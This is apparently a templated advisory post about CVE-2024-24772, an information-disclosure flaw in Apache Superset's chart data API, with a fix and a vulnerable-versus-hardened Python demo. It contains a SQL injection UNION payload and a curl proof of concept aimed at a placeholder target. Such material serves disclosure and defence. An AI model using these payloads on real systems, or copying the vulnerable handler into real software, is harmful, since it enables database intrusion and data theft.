Author: [Your_Name_here]
Date: [Date_here]
Summary: Apache Superset is affected by an information disclosure issue in which a guest user could exploit an oversight in the chart data REST API and leak sensitive data from the analytics database. This post covers the vulnerability details, steps to reproduce it, links to the original references and the recommended fix.

===

Apache Superset is an open-source data analytics and visualization platform that helps users turn raw data into clear, insightful visualizations. It ships with a rich feature set, including support for a wide range of analytics database backends. To make data easy to reach programmatically, Apache Superset exposes a set of REST APIs that can be used to interact with the server's data and functions.

However, as described in CVE-2024-24772, a guest user could exploit an oversight in the chart data REST API and send arbitrary SQL statements which, on error, could leak sensitive information from the underlying analytics database. This issue affects Apache Superset versions before 3.0.4, and versions from 3.1.0 before 3.1.1.

Source Code Snippet

The vulnerability stems from improper input validation in the chart data API: the SQL string supplied by the caller is executed without any check on the caller's role or on the statement itself, and the database error text is handed straight back to the client. The following simplified snippet illustrates the flawed pattern (a method on a Flask-AppBuilder view; the query helper is shown as called, not defined):

from flask import request, jsonify
from flask_appbuilder import expose

@expose('/chart-data', methods=['POST'])
def get_chart_data(self):
    sql_query = request.form.get('sql')                    # attacker-controlled string, no role check
    chart_data = get_chart_data_from_sql_query(sql_query)  # executed unchanged; DB errors surface to the caller
    return jsonify(chart_data)

How to Exploit

A guest user can send a crafted SQL query which, upon execution, either returns rows the guest should never see or fails with a database error message that itself discloses schema details. For instance, an attacker could craft a payload like:

1' UNION ALL SELECT NULL, CONCAT('Sensitive_Data:', table_name) FROM information_schema.tables WHERE table_schema='my_schemas'--

Proof-of-Concept

To reproduce the vulnerability, an attacker could use curl or any other HTTP client to issue a POST request to the affected chart data API with the malicious SQL string. Because the payload contains spaces, quotes and a trailing comment marker, it should be URL-encoded rather than passed raw:

curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "sql=<MALICIOUS_SQL_QUERY>" http://<TARGET-SUPERSET-INSTANCE>/chart-data

If the request goes through, the response may disclose data such as:

{
    "error": "Unknown error: unknown_table_name",
    "info": "Sensitive_Data:users,passwords,sales_data",
    ...
}
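To make the flaw concrete, here is an added, self-contained example that is not Superset's own code: it places the vulnerable pattern beside a hardened handler and runs both against an in-memory SQLite database with constructed tables standing in for the analytics backend. The function names, the User role model, the allow-lists and the SQLite-flavoured payloads (sqlite_master plays the role of information_schema) are assumptions made for illustration.

```python
import sqlite3
from dataclasses import dataclass


# Constructed demo database standing in for the analytics backend.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sales_data (region TEXT, amount INTEGER);
        INSERT INTO sales_data VALUES ('north', 100), ('south', 250);
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', '$2b$12$constructed-sample-hash');
    """)
    return conn


@dataclass
class User:
    name: str
    role: str  # "Guest" or a regular role such as "Gamma" (assumed model)


def vulnerable_chart_data(conn, user, form):
    """The flawed pattern: whatever arrives in the 'sql' field is executed
    as-is for any caller, and the database's own error text is echoed back,
    so both the result set and the error message can leak schema details."""
    sql_query = form.get("sql", "")
    try:
        return {"result": conn.execute(sql_query).fetchall(), "status": 200}
    except sqlite3.Error as exc:
        return {"error": str(exc), "status": 500}  # leaks table/column names


# Hardened handler: the caller never supplies SQL. It names a table, a column
# and a metric, each checked against an allow-list before any statement is
# built, and guest accounts are refused outright.
ALLOWED_METRICS = {"sum": "SUM", "count": "COUNT"}
ALLOWED_COLUMNS = {"sales_data": {"region", "amount"}}


def hardened_chart_data(conn, user, form):
    if user.role == "Guest":
        return {"error": "Forbidden", "status": 403}
    table, column, metric = form.get("table"), form.get("column"), form.get("metric")
    if (table not in ALLOWED_COLUMNS
            or column not in ALLOWED_COLUMNS[table]
            or metric not in ALLOWED_METRICS):
        return {"error": "Invalid chart request", "status": 400}
    # Identifiers are taken from the allow-list entries, not from the request.
    sql = f"SELECT {ALLOWED_METRICS[metric]}({column}) FROM {table}"
    try:
        value = conn.execute(sql).fetchone()[0]
        return {"result": value, "status": 200}
    except sqlite3.Error:
        # Log the real exception server-side; tell the client nothing about the schema.
        return {"error": "Query failed", "status": 500}


# Payloads in the spirit of the one above, rewritten for SQLite's catalog table.
UNION_PAYLOAD = ("SELECT amount FROM sales_data UNION ALL "
                 "SELECT 'Sensitive_Data:' || name FROM sqlite_master WHERE type='table'")
ERROR_PAYLOAD = "SELECT secret FROM no_such_table"

if __name__ == "__main__":
    db = make_demo_db()
    guest = User("anonymous", "Guest")
    chart = {"table": "sales_data", "column": "amount", "metric": "sum"}
    print(vulnerable_chart_data(db, guest, {"sql": UNION_PAYLOAD}))   # table names leak in rows
    print(vulnerable_chart_data(db, guest, {"sql": ERROR_PAYLOAD}))   # table name leaks in error
    print(hardened_chart_data(db, guest, chart))                      # 403 for the guest
    print(hardened_chart_data(db, User("alice", "Gamma"), chart))     # 350 for a real user
```

The two leaks the vulnerable handler exhibits are exactly the two the advisory describes: a UNION payload pulls catalog entries into the result set, and a query against a non-existent object makes the database name that object in its error text. The hardened form closes both paths at once by never accepting SQL from the client, rejecting guests before any query runs, and mapping backend exceptions to a fixed message.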

Original References

- Apache Superset GitHub Repository
- CVE-2024-24772 Vulnerability Details
- Apache Superset Official Blog
- Recommended Patch for CVE-2024-24772

Solution

To fix this vulnerability, upgrade Apache Superset to version 3.0.4 or 3.1.1, both of which incorporate the patch addressing this issue. Keep the software up to date and monitor the Apache Superset project repository for future security updates.

If you have any questions or concerns about upgrading your Apache Superset instance, please refer to the official Apache Superset documentation for assistance.

Stay up-to-date and secure your data by fixing this vulnerability as soon as possible.

Timeline

Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC